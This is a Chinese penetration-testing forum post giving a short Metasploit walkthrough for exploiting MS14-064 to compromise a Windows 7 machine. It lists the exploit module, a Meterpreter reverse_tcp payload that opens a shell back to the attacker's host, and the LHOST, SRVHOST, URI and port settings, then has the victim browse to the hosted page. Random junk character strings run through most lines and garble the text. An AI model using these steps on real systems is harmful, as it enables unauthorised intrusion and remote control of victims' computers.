中国网络渗透测试联盟

标题: MS14-064 漏洞测试入侵win7 [打印本页]

作者: admin    时间: 2018-10-20 20:20
标题: MS14-064 漏洞测试入侵win7

, P3 r) P- o& I Y" J5 u' h1 s 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 ( I, r) e, E* | c

9 Q, s5 H# x) f5 e

, T: ~ p8 w1 d& B2 m0 q9 F 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: " }* J1 z) f8 H0 ~. ]. P

1 N# A" r i( Z) v9 i+ g5 a

9 X6 T' [! k! u# m) c 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp / X3 Z/ r5 O: p' F8 f

% O' V, H) s/ q

# H! V1 n# y/ V- \4 j5 @             set AllowPowershellPrompt true0 B- {0 V) w% k; s

$ v, x' R# U2 V a

( Z9 O: E2 M6 o' H             Set LHOST 192.168.0.109$ f+ M, K+ C: n/ I3 k3 W& y% ~

; m6 ?# M) P* O3 b2 X

/ W, Y! w( }/ S* V9 V B" n             set SRVHOST 192.168.0.109 2 b! t5 _3 }. Q

4 P) W' T# f. M

* h# Y1 \2 M5 I' n9 n             Set uripath share9 W! k* U6 }; M1 d

/ I1 r2 ~" F" l x$ C. H- j

) V1 i: X( ^+ J9 a- j2 Z! [             Set srvport 80 0 N4 e/ ?3 q! M9 u; t9 V3 O

+ C& O/ N( E* ~

& T- K6 [+ _/ S% ~   , x3 X: A# Q+ g4 N }) _5 O

5 X' o( U7 _6 S6 s* t) B3 j, |, r

4 v; R: Z8 i4 L$ b0 a: {. T  $ g0 Q" E/ [5 ]: p

% a# P- {4 p2 y& E# I9 N& F; d

4 i; v {( S) @! D  7 Y/ U. h& r( `3 `! B( S6 O. D, z4 e

* e) I) l/ F$ k- Y$ R

# f$ {& n6 U. L0 q- _% g  0 T! Z" v: d6 ]: f+ A+ X+ F) l

/ p0 [! y) g; {5 Z# R4 n

6 v; }' T l; @ A   5 F# \. I8 q0 B: k n b/ |

* h, r+ _7 F1 [' h( P7 a

0 {( p' B& K. M2 t3 y- H1 [0 v1 S 下面我们来访问本地地址如图:+ Y1 m$ t0 u7 y" f( E) c

$ R1 ^4 u% e K

6 Y4 d. @1 Q1 m* T5 g  ; }# b2 e3 I" C% X* m! v a* @

; U) r: J* i: Q; @( ?7 A

/ x# A( P% c- J( R) R1 n. h4 v   6 ], y! q' i) G2 l& h

' x$ Y* b& o0 \7 x' W7 B

: D) k9 D7 Y, P7 z! a" y3 ]1 ~ / S8 r" ? y( P4 e0 s, u" h: y% V






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2